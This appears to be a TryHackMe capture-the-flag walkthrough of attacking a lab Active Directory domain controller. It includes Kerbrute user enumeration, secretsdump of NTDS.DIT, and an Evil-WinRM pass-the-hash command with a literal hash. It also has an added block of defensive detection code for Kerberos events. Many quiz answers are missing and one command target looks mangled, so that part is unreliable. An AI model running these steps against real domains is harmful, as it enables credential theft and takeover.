In this walkthrough, we will be going through the Attacktive Directory room from TryHackMe. In this room we will be hacking a vulnerable domain controller in an Active Directory environment. If you are new to Active Directory, you should first clear your basics by going through TryHackMe's Active Directory Basics room. For now, I will assume you have already completed that room and we will march on from there. So, let's get started.
Objective – 99% of corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?
Task 1 – [Intro] Deploy The Machine
Task 2 – [Intro] Setup
Use the following commands to set up the tools and environment for the room (the clone target and the cd are included so that the /opt/impacket paths used by the later commands resolve):
sudo apt install python3.9
git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
cd /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
sudo pip3 install .
sudo python3 setup.py install
Task 3 – [Enumeration] Welcome to Attacktive Directory
Question 1 – What tool will allow us to enumerate port 139/445?
Question 2 – What is the NetBIOS-Domain Name of the machine?
Question 3 – What invalid TLD do people commonly use for their Active Directory Domain?
Task 4 – [Enumeration] Enumerating Users via Kerberos
Question 1 – What command within Kerbrute will allow us to enumerate valid usernames?
Question 2 – What notable account is discovered? (These should jump out at you)
Question 3 – What is the other notable account discovered? (These should jump out at you)
Use the following command to extract the username using Kerbrute:
./kerbrute_linux_amd64 userenum --dc 10.10.14.173 -d spookysec.local ~/Desktop/username.txt
Task 5 – [Exploitation] Abusing Kerberos
Question 1 – We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
Question 2 – Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
Kerberos 5 AS-REP etype 23
Question 3 – What mode is the hash?
Question 4 – Now crack the hash with the modified password list provided. What is the user account's password?
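The two Kerberos steps above (username enumeration with Kerbrute in Task 4, and the AS-REP etype 23 hash in Task 5) leave a distinct footprint in the domain controller's Security log, which is what a defender would hunt for. The following is an added example, not part of the original room or walkthrough: it runs simple detection logic over constructed Event ID 4768 records (real field names, constructed values; the client address 10.10.14.50 and threshold are assumptions).

```python
# Defender-side detection for the two Kerberos abuses this room walks through:
# a burst of TGT requests for unknown principals (Kerbrute userenum) and a TGT
# issued to an account without pre-authentication using RC4 (etype 0x17), which
# is what yields the "Kerberos 5 AS-REP etype 23" hash. Input is Windows
# Security Event ID 4768, modelled as dicts keyed by the event's own fields.
from collections import Counter

# Constructed sample 4768 events (assumed to come from the DC's Security log).
SAMPLE_4768 = [
    # kerbrute userenum: many unknown principals (Status 0x6) from one client
    *[{"TargetUserName": f"user{i}", "Status": "0x6", "PreAuthType": "0",
       "TicketEncryptionType": "0xffffffff", "IpAddress": "10.10.14.50"}
      for i in range(12)],
    # AS-REP roast: TGT issued with no pre-auth, encrypted with RC4-HMAC (0x17)
    {"TargetUserName": "svc-admin", "Status": "0x0", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.50"},
    # ordinary workstation logon: pre-auth used (type 2), AES256 (0x12)
    {"TargetUserName": "alice", "Status": "0x0", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.20.7"},
]

ENUM_THRESHOLD = 10  # unknown-principal failures per source before alerting


def asrep_roast_events(events):
    """4768 successes where the KDC issued a TGT without pre-authentication
    and encrypted the AS-REP with RC4 (0x17); each one is crackable offline."""
    return [e for e in events
            if e["Status"] == "0x0" and e["PreAuthType"] == "0"
            and e["TicketEncryptionType"].lower() == "0x17"]


def enumeration_sources(events, threshold=ENUM_THRESHOLD):
    """Client addresses with at least `threshold` 4768 failures carrying
    Status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN): the footprint of userenum."""
    counts = Counter(e["IpAddress"] for e in events if e["Status"] == "0x6")
    return {ip: n for ip, n in counts.items() if n >= threshold}


def no_preauth_accounts(events):
    """Accounts whose 'Do not require Kerberos preauthentication' flag should
    be cleared: the remediation for the roast, derived from the same events."""
    return sorted({e["TargetUserName"] for e in asrep_roast_events(events)})
```

Auditing of Kerberos Authentication Service events must be enabled on the DC for 4768 to be logged at all.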
Task 6 – [Enumeration] Back to the Basics
Question 1 – What utility can we use to map remote SMB shares?
Question 2 – Which option will list shares?
Question 3 – How many remote shares is the server listing?
smbclient -L 10.10.14.173 -U svc-admin
Question 4 – There is one particular share that we have access to that contains a text file. Which share is it?
Question 5 – What is the content of the file?
Question 6 – Decoding the contents of the file, what is the full contents?
Task 7 – [Domain Privilege Escalation] Elevating Privileges within the Domain
Question 1 – What method allowed us to dump NTDS.DIT?
secretsdump.py -just-dc email@example.com
Question 2 – What is the Administrators NTLM hash?
Question 3 – What method of attack could allow us to authenticate as the user without the password?
Pass the Hash
Question 4 – Using a tool called Evil-WinRM, what option will allow us to use a hash?
Task 8 – [Flag Submission] Flag Submission Panel
Question 1 – svc-admin
Question 2 – backup
Question 3 – Administrator
ruby evil-winrm.rb -i 10.10.14.173 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
So that was it. We started by enumerating the services running on ports 139 and 445 using enum4linux. After that, we brute-forced Kerberos usernames using Kerbrute, getting two potential usernames: svc-admin and backup. Moving on, we obtained the hashes and passwords of the accounts. Then we connected to the user's shares using smbclient, where we found a file containing a base64 string. Decoding the string in CyberChef, we got the domain and username with creds. Further, we used Evil-WinRM to access and move within the machine using Pass the Hash. Finally, we got a shell and dumped all the flags to complete the challenge. On that note, I bid goodbye for now and will be back with another walkthrough; till then, "Hack the planet".